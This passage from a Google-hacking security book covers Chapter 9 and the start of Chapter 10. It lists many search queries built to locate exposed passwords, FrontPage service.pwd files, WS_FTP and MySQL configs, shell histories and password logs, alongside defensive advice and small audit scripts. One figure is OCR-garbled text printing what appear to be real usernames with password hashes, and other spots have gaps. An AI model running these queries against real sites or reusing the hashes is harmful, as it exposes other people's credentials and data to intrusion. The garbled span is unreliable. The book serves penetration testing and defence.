The value of a username is often overlooked, but as we saw in Chapters 4 and 5, an entire multimillion-dollar security system can be shattered through skillful crafting of even the smallest, most innocuous bit of information. Next, we take a look at queries that are designed to uncover passwords. Some of the queries we look at reveal encrypted or encoded passwords, which will take a bit of work on the part of an attacker to use to his or her advantage. We also take a look at queries that can uncover cleartext passwords. These queries are some of the most dangerous in the hands of even the most novice attacker. What could make an attack easier than handing a username and cleartext password to an attacker?

We wrap up this chapter by discussing the very real possibility of uncovering highly sensitive data such as credit card information and information used to commit identity theft, such as Social Security numbers. Our goal here is to explore ways of protecting against this very real threat. To that end, we don't go into details about uncovering financial information and the like. If you're a "dark side" hacker, you'll need to figure these things out on your own.

Searching for Usernames

Most authentication mechanisms use a username and password to protect information. To get through the "front door" of this type of protection, you'll need to determine usernames as well as passwords. Usernames also can be used for social engineering efforts, as we discussed earlier.

Many methods can be used to determine usernames. In Chapter 10, we explored ways of gathering usernames via database error messages. In Chapter 8 we explored Web server and application error messages that can reveal various information, including usernames. These indirect methods of locating usernames are helpful, but an attacker could target a usernames directory with a simple
This phrase can locate help pages that describe the username creation process, as shown in Figure 9.1. Figure 9.1 Help Documents Can Reveal Username Creation Processes Your accoLirt - userrames ] fc^ |G|http:/;64,233.161,104/search7q " "vour us*^rname is" Undergraduates and Taught Postgraduates Usenwnea for Lndergraduates arri tajght postgraduates consist of your iiitials. a rumber (used to differentiate lietween common sets of initiaisj arid Ihs year of entry. abc502 or xyz203 abc502 woLid be tl°te Lsemame of the fifth person to subscribe with the initiais A. B.C. during the 02/03 academic year artd xyz2c:pwd inurl:_vti_pvt inurl:(Service | authors | administrators) FrontPage- ekendall:bYld1Sr73NLKo lQuisa:5zm94d7cdDFiQ # -FrontPage^ ekendalhbVldlSr/SNLKo loui3.a:5zm94d7cdDFiQ .orgi'garderobe' vti pvf service. pwd - Ik - Cach&d - Similar pages FrontPage- admlnYbVUnafKRmnQ # -FrontPage^ admin:VbV1JnafKRmnQ org/ COO 74 92 vti pvt/ service. pwd - 1k - Caclied - Simiiar pages FrontPage- grahaale ylLSFSEqk/cQs ftpdch:Zh4nBb7KWKsxl rineerdo .. # -FrontPage- grajnaai&ylLSFSEqlf/cQs flpdch:Zli4nBb7KWKsxl iserdoicaskSSqUyjjzQ spykecwirVRhzdwctSoypQ va.us/Schoois/DCHS/ vti..pvUservice.pwd - 1l( - Suppiementai Result - Caclied - Simiiar pages FrontPage- grahaale:5XLzQNL12VeNEftDbrD:Ed8A/1ICDWfgc # -FrontPage- 9rahaaie:5XLzoNL12VeNE ftpbrpiEdBA/llcpwfqc ' ya.usySclnoDlsyBPiPy vti pvyservice.pwd - Ik - Suppiementai Reauit - Cactied - Simiiar pages FrontPage- free:$ 1 $p5leU_hH $36Vc | jfVwlASYz3qlBy3cA. § -FrontPage- free:$1£pSieU_hH$36VqjfVwiASYzSqiBv3cA. .com/ vti. „pvL^ service. pwd - Ik - Caciied - Simiiar oaoes FrontPage- fDadnnin:glV41mLwSI6kg kherad:GRxN4Aia1rOIY # -FrontPage^ fpadminigiV41mLw6i5k9 kherad:GRxN4Aia1rOfY Jry-kiierady vli pvb' service. pwd - Ik - Cacl^&d - Similar p FrontPage- admin :Qc2yLX8tcpQv2 # -FrontPage^ admin:Oc2yD(9tcpOv2 ^ Display a m www.syngress.com 274 Chapter 9 • Usernames, Passwords, and Secret Stuff, Oh My! 
Exported Windows registry files often contain encrypted or encoded passwords as well. If a user exports the Windows registry to a file and Google subsequently crawls that file, a query like filetype:reg intext:"internet account manager" could reveal interesting keys containing password data, as shown in Figure 9.7.

Figure 9.7 Specific Windows Registry Entries Can Reveal Passwords
(Screenshot of a cached registry export found with the query filetype:reg reg +intext:"internet account manager". It shows a key under HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts with values such as the account name, POP3 and SMTP server names, the POP3 username, port and timeout settings, and a hex-encoded POP3 password.)

Note that live, exported Windows registry files are not very common, but it's not uncommon for an attacker to target a site simply because of one exceptionally insecure file. It's also possible for a Google query to uncover cleartext passwords. These passwords can be used as is without having to employ a password-cracking utility. In these extreme cases, the only challenge is determining the username as well as the host on which the password can be used. As shown in Figure 9.8, certain queries will locate all the following information: usernames, cleartext passwords, and the host that uses that authentication!
Figure 9.8 The Holy Grail: Usernames, Cleartext Passwords, and Hostnames!
(Screenshot of Google results for password log files. Each hit lists entries of the form name: = "..."; password: = "..."; URL: = "...";.)

There is no magic query for locating passwords, but during an assessment, remember that the simplest queries directed at a site can have amazing results, as we discussed in Chapter 7, Ten Simple Searches. For example, a query like "Your password" forgot would locate pages that provide a forgotten password recovery mechanism. The information from this type of query can be used to formulate any of a number of attacks against a password. As always, effective social engineering is a terrific nontechnical solution to "forgotten" passwords.

Another generic search for password information, intext:(password | passcode | pass) intext:(username | userid | user), combines common words for passwords and user IDs into one query. This query returns a lot of results, but the vast majority of the top hits refer to pages that list forgotten password information, including either links or contact information. Using Google's translate feature, found at http://translate.google.com/translate_t, we could also create multilingual password searches.
Table 9.3 lists common translations for the word password.

Table 9.3 English Translations of the Word Password

Language     Word       Translation
German       password   Kennwort
Spanish      password   contraseña
French       password   mot de passe
Italian      password   parola d'accesso
Portuguese   password   senha
Dutch        password   Paswoord

NOTE
The terms username and userid in most languages translate to username and userid, respectively.

Searching for Credit Card Numbers, Social Security Numbers, and More

Most people have heard news stories about Web hackers making off with customer credit card information. With so many fly-by-night retailers popping up on the Internet, it's no wonder that credit card fraud is so prolific. These mom-and-pop retailers are not the only ones successfully compromised by hackers. Corporate giants by the hundreds have had financial database compromises over the years, victims of sometimes very technical, highly focused attackers. What might surprise you is that it doesn't take a rocket scientist to uncover live credit card numbers on the Internet, thanks to search engines like Google. Everything from credit information to banking data or supersensitive classified government documents can be found on the Web. Consider the (highly edited) Web page shown in Figure 9.9.

Figure 9.9 Google Stores Piles and Piles of Previously Pilfered Personal Data
(Screenshot of a heavily redacted document listing card entries.)

This document, found using Google, lists hundreds and hundreds of credit card numbers (including expiration date and card validation numbers) as well as the owners' names, addresses, and phone numbers. This particular document also included phone card (calling card) numbers.
Notice the scroll bar on the right-hand side of Figure 9.9, an indicator that the displayed page is only a small part of this huge document, like many other documents of its kind. In most cases, pages that contain these numbers are not "leaked" from online retailers or e-commerce sites but rather are most likely the fruits of a scam known as phishing, in which users are solicited via telephone or e-mail for personal information. Several Web sites, including MillerSmiles.co.uk, document these scams and hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that encourages users to update their eBay profile information.

Figure 9.10 Screenshot of an eBay Phishing Scam
(Screenshot, hosted at www.millersmiles.co.uk, of a fake "Update your eBay Account!" page. The form claims to be protected by SSL and asks for the user's eBay ID and password, followed by credit or debit card details.)

Once a user fills out this form, all the information is sent via e-mail to the attacker, who can use it for just about anything.

Tools and Traps
Catching Online Scammers

In some cases, you might be able to use Google to help nab the bad guys. Phishing scams are effective because the fake page looks like an official page. To create an official-looking page, the bad guys must have examples to work from, meaning that they must have visited a few legitimate companies' Web sites.
If the phishing scam was created using text from several companies' existing pages, you can key in on specific phrases from the fake page, creating Google queries designed to round up the servers that hosted some of the original content. Once you've located the servers that contained the pilfered text, you can work with the companies involved to extract correlating connection data from their log files. If the scammer visited each company's Web page, collecting bits of realistic text, his IP should appear in each of the log files. Auditors at SensePost (www.sensepost.com) have successfully used this technique to nab online scam artists.

Unfortunately, [...] scammer uses an exact copy of a page from only one [...]

Social Security Numbers

Social Security numbers (SSNs) and other sensitive data can be easily located with Google as well as via the same techniques used to locate credit card numbers. For a variety of reasons, SSNs might appear online. For example, educational facilities are notorious for using an SSN as a student ID, then posting grades to a public Web site with the "student ID" displayed next to the grade. A creative attacker can do quite a bit with just an SSN, but in many cases it helps to also have a name associated with that SSN. Again, educational facilities have been found exposing this information via Excel spreadsheets listing students' names, grades, and SSNs, despite the fact that the student ID number is often used to help protect the privacy of the student!

Although we don't feel it's right to go into the details of how this data is located, several media outlets have irresponsibly posted the details online. Although the blame lies with the sites that are leaking this information, in our opinion it's still not right to draw attention to how exactly the information can be located.
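On the defensive side, the grade-sheet exposure described above can be caught before a file is ever published. The following is a minimal sketch, not a complete data-loss-prevention tool: it assumes the spreadsheet has been exported to plain text or CSV, it only recognizes the hyphenated NNN-NN-NNNN layout, and the function name find_ssn_like is hypothetical.

```python
import re

# Matches the common NNN-NN-NNNN layout only; unformatted nine-digit runs are not detected.
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")


def find_ssn_like(text):
    """Return (line_number, masked_match) pairs for SSN-shaped strings in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in SSN_PATTERN.finditer(line):
            # Mask all but the last four digits so the report itself does not leak data.
            findings.append((lineno, "***-**-" + match.group()[-4:]))
    return findings
```

Running a check like this over every file bound for a public Web directory gives an administrator a chance to replace the offending column with a real student ID before Google ever crawls it.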
Personal Financial Data

In some cases, phishing scams are responsible for publicizing personal information; in other cases, hackers attacking online retailers are to blame for this breach of privacy. Sadly, there are many instances where an individual is personally responsible for his own lack of privacy. Such is the case with personal financial information. With the explosion of personal computers in today's society, users have literally hundreds of personal finance programs to choose from. Many of these programs create data files with specific file extensions that can be searched with Google. It's hard to imagine why anyone would post personal financial information to a public Web site (which subsequently gets crawled by Google), but it must happen quite a bit, judging by the number of hits for program files generated by Quicken and Microsoft Money, for example.

Although it would be somewhat irresponsible to provide queries here that would unearth personal financial data, it's important to understand the types of data that could potentially be uncovered by an attacker. To that end, Table 9.4 shows file extensions for various financial, accounting, and tax return programs. Ensure that these filetypes aren't listed on a webserver you're charged with protecting.
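A check of this kind is easy to script against your own server. The following is a minimal sketch under stated assumptions: it walks a local copy of the Web root, it covers only the clearly legible extensions from Table 9.4, and the function name find_financial_files is hypothetical rather than part of any existing tool.

```python
import os

# A subset of the extensions listed in Table 9.4; adjust for your own environment.
FINANCIAL_EXTENSIONS = {
    "afm", "ab4", "mmw", "et2", "tax", "mny", "mbf", "inv",
    "ptdb", "qbb", "qdf", "soa", "sdb", "tmd", "wow",
}
# t98 through t04: Kiplinger Tax Cut files, named after the two-digit return year.
FINANCIAL_EXTENSIONS.update(f"t{year % 100:02d}" for year in range(1998, 2005))


def find_financial_files(web_root):
    """Return sorted paths under web_root whose extension is in FINANCIAL_EXTENSIONS."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(web_root):
        for name in filenames:
            # Compare case-insensitively, since servers may hold BUDGET.QDF or budget.qdf.
            ext = os.path.splitext(name)[1].lstrip(".").lower()
            if ext in FINANCIAL_EXTENSIONS:
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)
```

Calling find_financial_files on the document root of a server you administer returns every matching path; any hit is a file that probably should not be reachable from the Web.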
Table 9.4 File Extensions for Various Financial Programs

File Extension   Description
afm              Abassis Finance Manager
ab4              Accounting and Business File
mmw              AceMoney File
Iqd              AmeriCalc Mutual Fund Tax Report
et2              Electronic Tax Return Security File (Australia)
tax              Intuit TurboTax Tax Return
t98-t04          Kiplinger Tax Cut File (extension based on two-digit return year)
mny              Microsoft Money 2004 Money Data Files
mbf              Microsoft Money Backup Files
inv              MSN Money Investor File
ptdb             Peachtree Accounting Database
qbb              QuickBooks Backup Files reveal financial data
qdf              Quicken personal finance data
soa              Sage MAS 90 accounting software
sdb              Simply Accounting
stx              Simply Tax Form
tmd              Time and Expense Tracking
tis              Timeless Time & Expense
fec              U.S. Federal Campaign Expense Submission
wow              Wings Accounting File

Searching for Other Juicy Info

As we've seen, Google can be used to locate all sorts of sensitive information. In this section we take a look at some of the data that Google can find that's harder to categorize. From address books to chat log files and network vulnerability reports, there's no shortage of sensitive data online. Table 9.5 shows some queries that can be used to uncover various types of sensitive data.

Table 9.5 Queries That Locate Various Sensitive Information

Query                                                             Description
intext:"Session Start * * * *:*:* *" filetype:log                 AIM and IRC log files
filetype:blt blt +intext:screenname                               AIM buddy lists
buddylist.blt                                                     AIM buddy lists
intitle:index.of cgiirc.config                                    CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
inurl:cgiirc.config                                               CGIIRC (Web-based IRC client) config file, shows IRC servers and user credentials
"Index of" / "chat/logs"                                          Chat logs
intitle:"Index Of" cookies.txt "size"                             cookies.txt file reveals user information
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"     Curriculum vitae (resumes) reveal names and address information
ext:ini intext:env.ini                                            Generic environment data
intitle:index.of inbox                                            Generic mailbox files
"Running in Child mode"                                           Gnutella client data and statistics
":8080" ":3128" ":80" filetype:txt                                HTTP Proxy lists
intitle:"Index of" dbconvert.exe chats                            ICQ chat logs
"sets mode: +p"                                                   IRC private channel information
"sets mode: +s"                                                   IRC secret channel information
"Host Vulnerability Summary Report"                               ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
"Network Vulnerability Assessment Report"                         ISS vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
filetype:pot inurl:john.pot                                       John the Ripper password cracker results
intitle:"Index Of" -inurl:maillog maillog size                    Maillog files reveal e-mail traffic information
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb                           Microsoft FrontPage database folders
filetype:xls inurl:contact                                        Microsoft Excel sheets containing contact information
intitle:index.of haccess.ctl                                      Microsoft FrontPage equivalent(?) of htaccess shows Web authentication info
ext:log "Software: Microsoft Internet Information Services *.*"   Microsoft Internet Information Services (IIS) log files
filetype:pst inurl:"outlook.pst"                                  Microsoft Outlook e-mail and calendar backup files
intitle:index.of mt-db-pass.cgi                                   Movable Type default file
filetype:ctt ctt messenger                                        MSN Messenger contact lists
"This file was generated by Nessus"                               Nessus vulnerability scanner reports, reveal potential vulnerabilities on hosts and networks
inurl:"newsletter/admin/"                                         Newsletter administration information
inurl:"newsletter/admin/" intitle:"newsletter admin"              Newsletter administration information
filetype:eml eml intext:"Subject" +From                           Outlook Express e-mail files
intitle:index.of inbox dbx                                        Outlook Express Mailbox files
intitle:index.of inbox dbx                                        Outlook Express Mailbox files
filetype:mbx mbx intext:Subject                                   Outlook v1-v4 or Eudora mailbox files
inurl:/public/?Cmd=contents                                       Outlook Web Access public folders or appointments
filetype:pdb pdb backup (Pilot | Pluckerdb)                       Palm Pilot Hotsync database files
"This is a Shareaza Node"                                         Shareaza client data and statistics
inurl:/_layouts/settings                                          Sharepoint configuration information
inurl:ssl.conf filetype:conf                                      SSL configuration files, reveal various configuration information
site:edu admin grades                                             Student grades
intitle:index.of mystuff.xml                                      Trillian user Web links
inurl:forward filetype:forward -cvs                               UNIX mail forward files reveal e-mail addresses
intitle:index.of dead.letter                                      UNIX unfinished e-mails
filetype:conf inurl:unrealircd.conf -cvs -gentoo                  UnrealIRCd config file reveals configuration information
filetype:bkf bkf                                                  Windows XP/2000 backup files

Some of this information is fairly benign, for example, MSN Messenger contact list files that can be found with a query like filetype:ctt messenger, or AOL Instant Messenger (AIM) buddy lists that can be located with a query such as filetype:blt blt +intext:screenname, as shown in Figure 9.11.

Figure 9.11 AIM Buddy Lists Reveal Personal Relationships
(Screenshot of a cached AIM buddy list file listing screen names.)

This screen shows a list of "buddies," or acquaintances an individual has entered into his or her AIM client. An attacker often uses personal information like this in a social-engineering attack, attempting to convince the target that they are a friend or an acquaintance. This practice is akin to pilfering a Rolodex or address book from a target. For a seasoned attacker, information like this can lead to a successful compromise. However, in some cases, data found with a Google query reveals sensitive security-related information that even the most novice attacker could use to compromise a system.

For example, consider the output of the Nessus security scanner available from www.nessus.org. This excellent open-source tool conducts a series of security tests against a target, reporting on any potential vulnerability. The report generated by Nessus can then be used as a guide to help system administrators lock down any affected systems. An attacker could also use a report like this to locate vulnerabilities on a potential target. Using a Google query such as "This file was generated by Nessus", an attacker could locate reports generated by the Nessus tool, as shown in Figure 9.12.
This report lists the IP address of each tested machine as well as the ports opened and any vulnerabilities that were detected.

Figure 9.12 Nessus Vulnerability Reports Found Online
(Screenshot of a Nessus report found with the query "This file was generated by Nessus". It lists open ports such as ftp (21/tcp), smtp (25/tcp), http (80/tcp), https (443/tcp), and pcanywheredata (5631/tcp), several flagged with security holes or warnings, followed by a finding that the remote FTP server closes the connection when USER, PASS, or HELP is given a too-long argument, probably because of a buffer overflow.)

In most cases, reports found in this manner are samples, or test reports, but in a few cases, the reports are live and the tested systems are, in fact, exploitable as listed. One can only hope that the reported systems are honeypots, machines created for the sole purpose of luring and tracing the activities of hackers. In the next chapter, we'll talk more about "document-grinding" techniques, which are also useful for digging up this type of information. This chapter focused on locating the information based on the name of the file, whereas the next chapter focuses on the actual content of a document rather than the name.

Summary

Make no mistake: there's sensitive data on the Web, and Google can find it. There's hardly any limit to the scope of information that can be located, if only you can figure out the right query. From usernames to passwords, credit card and Social Security numbers, and personal financial information, it's all out there.
As a purveyor of the "dark arts," you can relish in the stupidity of others, but as a professional tasked with securing a customer's site from this dangerous form of information leakage, you could be overwhelmed by the sheer scale of your defensive duties.

As droll as it might sound, a solid, enforced security policy is a great way to keep sensitive data from leaking to the Web. If users understand the risks associated with information leakage and understand the penalties that come with violating policy, they will be more willing to cooperate in what should be a security partnership.

In the meantime, it certainly doesn't hurt to understand the tactics an adversary might employ in attacking a Web server. One thing that should become clear as you read this book is that any attacker has an overwhelming number of files to go after. One way to prevent dangerous Web information leakage is by denying requests for unknown file types. Whether your Web server normally serves up CFM, ASP, PHP, or HTML, it's infinitely easier to manage what should be served by the Web server instead of focusing on what should not be served. Adjust your servers or your border protection devices to allow only specific content or file types.

Solutions Fast Track

Searching for Usernames
■ Usernames can be found in a variety of locations.
■ In some cases, digging through documents or e-mail directories might be required.
■ A simple query such as "your username is" can be very effective in locating usernames.

Searching for Passwords
■ Passwords can also be found in a variety of locations.
■ A query such as "Your password" forgot can locate pages that provide a forgotten-password recovery mechanism.
■ intext:(password | passcode | pass) intext:(username | userid | user) is another generic search for locating password information.
Searching for Credit Card Numbers, Social Security Numbers, and More
■ Documents containing credit card and Social Security number information do exist and are relatively prolific.
■ Some irresponsible news outlets have revealed functional queries that locate this information.
■ There are relatively few examples of personal financial data online, but there is a great deal of variety.
■ In most cases, specific file extensions can be searched for.

Searching for Other Juicy Info
■ From address books and chat log files to network vulnerability reports, there's no shortage of sensitive data online.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: I'm concerned about phishing schemes. Are there resources to help me understand the risks and learn some safeguards?

A: There's an excellent Web site dedicated to the topic of phishing at www.antiphishing.org. You can also read a great white paper by Next Generation Security Software Ltd., The Phishing Guide: Understanding and Preventing Phishing Attacks, available from www.ngssoftware.com/papers/NISR-WP-Phishing.pdf.

Q: Why don't you give more details about locating information such as credit card numbers and Social Security numbers?

A: To be honest, neither the authors nor the publisher is willing to take personal responsibility for encouraging potential illegal activity. Most individuals interested in this kind of information will use it for illegal purposes. If you are interested in scanning for your own personal information online, simply enter your information into Google. If you get some hits, you should be worried.

Q: Many passwords grant access to meaningless services. Why should I be worried about the password for a useless service getting out to the Web?

A: Studies have shown that the majority of people opt for the easiest path to completing a task. In the world of security, this means that many people share passwords (or password cues) across many different applications on many different servers. This means that one compromised password can provide clues about passwords used on other systems. Most policies forbid this type of password sharing, but this restriction is often hard to enforce.

Q: What can bad guys do with the password to our database? And if the information is not sensitive, why go the extra mile to protect it?

A: Users generally have a small set of passwords they can remember. This means that once a bad guy has a valid password, chances are good that it will "Open Sesame" to more sensitive data.

Chapter 10
Document Grinding and Database Digging

Solutions in this Chapter:
■ Configuration Files
■ Log Files
■ Office Documents
■ Database Information
■ Automated Grinding
■ Google Desktop Search
■ Links to Sites
■ Summary
■ Solutions Fast Track
■ Frequently Asked Questions

Introduction

There's no shortage of documents on the Internet. Good guys and bad guys alike can use information found in documents to achieve their distinct purposes. In this chapter we take a look at ways you can use Google to not only locate these documents but to search within these documents to locate information.
There are so many different types of documents that we can't hope to cover them all, but we'll look at the documents in distinct categories based on their function. Specifically, we'll take a look at a few categories such as configuration files, log files, and office documents. Once we've looked at distinct file types, we'll delve into the realm of database digging. We won't examine the details of the Structured Query Language (SQL) or database architecture and interaction; rather, we'll look at the many ways Google hackers can locate and abuse database systems armed with nothing more than a search engine.

One important thing to remember about document digging is that Google will only search the rendered, or visible, view of a document. For example, consider a Microsoft Word document. This type of document can contain metadata, as shown in Figure 10.1. These fields include such things as the subject, author, manager, company, and much more. Google will not search these fields. If you're interested in getting to the metadata within a file, you'll have to download the actual file and check the metadata yourself.

Figure 10.1 Microsoft Word Metadata
(Screenshot of the Summary tab of a Word document's Properties dialog, showing fields such as Title, Author, Manager, Company, Category, Keywords, Comments, Hyperlink base, and Template.)

Configuration Files

Configuration files store program settings. An attacker (whether a good guy or a bad guy) can use these files to glean insight into the way the program is used and perhaps, by extension, into how the system or network it's on is used or configured. As we've seen in previous chapters, even the smallest tidbit of information is of interest to a skilled attacker.

Consider the file shown in Figure 10.2.
This file, found with a query such as filetype:ini inurl:ws_ftp, is a configuration file used by the WS_FTP client program. When the WS_FTP program is downloaded and installed, the configuration file contains nothing more than a list of popular, public Internet FTP servers. However, over time, this configuration file can be automatically updated to include the name, directory, username, and password of FTP servers the user connects to. Although the password is encoded when it is stored, some free programs can crack these passwords with relative ease.

Figure 10.2 The WS_FTP.INI File Contains Hosts, Usernames, and Passwords
(Screenshot of a cached WS_FTP.INI file. Each bracketed site entry carries settings such as HOST, UID, PWD, LOCDIR, DIR, and PASVMODE.)

Underground Googling
Locating Files

To locate files, it's best to try different types of queries. For example, intitle:index.of ws_ftp.ini will return results, but so will filetype:ini inurl:ws_ftp.ini. The latter search, however, is often the better choice. First, the filetype search allows you to browse right to a cached version of the page. Second, the directory listings found by the index.of search might not allow you access to the file. Third, directory listings are not overly common. The filetype search will locate your file no matter how Google found it.

Regardless of the type of data in a configuration file, sometimes the mere existence of a configuration file is significant.
If a configuration file is located on a server, there's a chance that the accompanying program is installed somewhere on that server or on neighboring machines on the network. Although this might not seem like a big deal in the case of FTP client software, consider a search like filetype:conf inurl:firewall, which can locate generic firewall configuration files. This example demonstrates one of the most generic naming conventions for a configuration file, the use of the conf file extension. Other generic naming conventions can be combined in a single search to locate equally common configuration files. One of the most common base searches for locating configuration files is simply (inurl:conf OR inurl:config OR inurl:cfg), which incorporates the three most common configuration file name fragments. This base search uses the inurl operator, since filetype terms cannot be successfully ORed together at the time of this writing.

If an attacker knows the name of a configuration file as it shipped from the software author or vendor, he can simply create a search targeting that filename using the filetype and inurl operators. However, most programs allow you to reference a configuration file of any name, making a Google search slightly more difficult. In these cases, it helps to get an idea of the contents of the configuration file, which could be used to extract unique strings for use in an effective base search. Sometimes, combining a generic base search with the name (or acronym) of a software product can have satisfactory results, as a search for (inurl:conf OR inurl:config OR inurl:cfg) MRTG shows in Figure 10.3.

Figure 10.3 Generic Configuration File Searching
Although this first search is not far off the mark, it's fairly common for even the best config file search to return page after page of sample or example files, like the sample MRTG configuration file shown in Figure 10.4.

Figure 10.4 Sample Config Files Need Filtering

This brings us back, once again, to perhaps the most valuable weapon in a Google hacker's arsenal: effective search reduction. Here's a list of the most common points a Google hacker considers when trolling for configuration files:

■ Create a strong base search using unique words or phrases from live files.
■ Filter out the words sample, example, test, howto, and tutorial to narrow the obvious example files.
■ Filter out CVS repositories, which often house default config files, with -cvs.
■ Filter out manpage or Manual if you're searching for a UNIX program's configuration file.
■ Locate the one most commonly changed field in a sample configuration file and perform a negative search on that field, reducing potentially "lame" or sample files.

To illustrate these points, consider the search filetype:cfg mrtg "target[*]" -sample -cvs -example, which locates potentially live MRTG files. As shown in Figure 10.5, this query uses a unique string ("target[*]") and removes potential example and CVS files, returning decent results.

Figure 10.5 A Common Search Reduction Technique

Some of the results shown in Figure 10.5 might not be real, live MRTG configuration files, but they all have potential, with the exception of the first hit, located in "/Squid-Book." There's a good chance that this is a sample file, but because of the reduction techniques we've used, the other results are potentially live, production MRTG configuration files.

Warning
The filetype argument cannot be properly ORed at the time of this writing. This means that if you have a couple of file extensions you need to search for in the same query, you should steer away from filetype and lean more toward inurl, which ORs wonderfully!
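The reduction steps and the inurl OR pattern described above are mechanical enough to sketch in a few lines of Python. The helper names or_group and reduce_query are hypothetical (they do not come from Google or the GHDB), and the sketch only assembles query strings; it does not submit them anywhere.

```python
def or_group(operator, values):
    """Build an ORed group such as (inurl:conf OR inurl:config OR inurl:cfg)."""
    return "(" + " OR ".join(f"{operator}:{value}" for value in values) + ")"


def reduce_query(base, exclude):
    """Append one negative (-term) filter per word to a base search."""
    return " ".join([base] + [f"-{term}" for term in exclude])


# Generic base search from the text, combined with a product name.
generic = or_group("inurl", ["conf", "config", "cfg"])
print(reduce_query(f"{generic} mrtg", ["sample", "example", "cvs"]))
# prints: (inurl:conf OR inurl:config OR inurl:cfg) mrtg -sample -example -cvs
```

Keeping the base search and the exclusion list separate makes it easy to drop a filter such as -cvs or -sample and look at the "messy" version of a search.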
Table 10.1 lists a collection of searches that locate various configuration files. These entries are gathered from the many contributions to the GHDB. This list highlights the various methods that can be used to target configuration files. You'll see examples of CVS reduction, sample reduction, unique word and phrase isolation, and more. Most of these queries took imagination on the part of the creator and in many cases took several rounds of reduction by several searchers to get to the query you see here. Learn from these queries, and try them out for yourself. It might be helpful to remove some of the qualifiers, such as -cvs or -sample, where applicable, to get an idea of what the "messy" version of the search might look like.

Table 10.1 Configuration File Search Examples

Query                                                                           Program                   Information Exposure
filetype:cfg ks intext:rootpw -sample -test -howto                              Anaconda                  Password
filetype:conf inurl:firewall -intitle:cvs                                       Firewall config files     Varied
inurl:ospfd.conf intext:password -sample -test -tutorial -download              GNU Zebra                 Network data
eggdrop filetype:user user                                                      IRC Eggdrop               Usernames, passwords, channels
LeapFTP intitle:"index.of./" sites.ini modified                                 LeapFTP client            Login credentials
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man          LILO                      Password
filetype:cfg mrtg "target[*]" -sample -cvs -example                             MRTG                      SNMP community strings
filetype:cnf my.cnf -cvs -example                                               MySQL database            Usernames, passwords, database, path information
filetype:ini inurl:perform.ini                                                  mIRC                      Channel information, nicknames, passwords
filetype:cfg auto_inst.cfg                                                      Mandrake auto-install     Usernames, installed packages, network settings
filetype:config config intext:appSettings "User ID"                             .NET Web application      Connection strings
allinurl:".nsconfig" -howto -tutorial -sample                                   Netscape Access Control   Access information
inurl:odbc.ini ext:ini -cvs                                                     ODBC                      Various
filetype:conf oekakibbs                                                         Oekakibbs                 Passwords
filetype:conf slapd.conf                                                        OpenLDAP                  Passwords, path information, application data
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample   OpenLDAP                  Credentials
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample        OpenLDAP                  rootdn credentials
intitle:index.of config.php                                                     PHP                       Usernames and passwords
inurl:config.php dbuname dbpass                                                 PHP                       Usernames and passwords
inurl:php.ini filetype:ini                                                      PHP                       Usernames, passwords, hostnames, IP
filetype:conf inurl:proftpd.conf -sample                                        ProFTPD server            Paths, log information, usernames
filetype:conf inurl:psybnc.conf "USER.PASS="                                    psyBNC                    Usernames, password
inurl:"smb.conf" intext:"workgroup" filetype:conf                               Samba                     Network information
filetype:ini ServUDaemon                                                        ServUDaemon               Setting information, usernames, passwords
inurl:ssl.conf filetype:conf                                                    SSL                       SSL data, various
filetype:ini inurl:trillian.ini                                                 Trillian                  Usernames, passwords, buddy lists, e-mail addresses
filetype:conf inurl:unrealircd.conf -cvs -gentoo                                UnrealIRCd                Server and client data, usernames, etc.
inurl:vtund.conf intext:pass -cvs                                               Virtual Tunnel (vtund)    Passwords
filetype:r1w r1w                                                                WRQ Reflection            Server connection settings
filetype:r2w r2w                                                                WRQ Reflection            Server connection settings
filetype:r4w r4w                                                                WRQ Reflection            Server connection settings
filetype:ini ws_ftp pwd                                                         WS_FTP                    Usernames, passwords, host information
intitle:index.of ws_ftp.ini                                                     WS_FTP                    Usernames, passwords, host information

Log Files

Log files record information.
Depending on the application, the information recorded in a log file can include anything from timestamps and IP addresses to usernames and passwords, and even incredibly sensitive data such as credit card numbers!

Like configuration files, log files often have a default name that can be used as part of a base search. The most common file extension for a log file is simply log, making the simplest base search for log files filetype:log inurl:log or the even simpler ext:log log. Remember that the ext (filetype) operator requires at least one search argument. Log file searches seem to return fewer sample and example files than configuration file searches, but search reduction is still required in some cases. Refer to the rules for configuration file reduction listed previously.

Table 10.2 lists a collection of log file searches collected from the GHDB. These searches show the various techniques that are employed by Google hackers and serve as an excellent learning tool for constructing your own searches during a penetration test.

Table 10.2 Log File Search Examples

Query                                                               Program
inurl:error.log filetype:log -cvs                                   Apache error log
inurl:access.log filetype:log -cvs                                  Apache access log (Windows)
filetype:log inurl:cache.log                                        Squid cache log
filetype:log inurl:store.log RELEASE                                Squid disk store log
filetype:log inurl:access.log TCP_HIT                               Squid access log
filetype:log inurl:useragent.log                                    Squid useragent log
filetype:log hijackthis "scan saved"                                Hijackthis scan log
ext:log "Software: Microsoft Internet Information Services *.*"     IIS server log files
filetype:log iserror.log                                            MS Install Shield logs
intitle:index.of .bash_history                                      UNIX bash shell history file
intitle:index.of .sh_history                                        UNIX shell history file
"Index of" / "chat/logs"                                            Chat logs
filetype:log username putty                                         Putty SSH client logs
filetype:log inurl:"password.log"                                   Password logs
filetype:log cron.log                                               UNIX cron logs
filetype:log access.log -CVS                                        HTTPD server access logs
+htpasswd WS_FTP.LOG filetype:log                                   WS_FTP client log files
"sets mode: +k"                                                     IRC logs, channel key set
"sets mode: +s"                                                     IRC logs, secret channel set
intitle:"Index Of" -inurl:maillog maillog size                      Mail log files
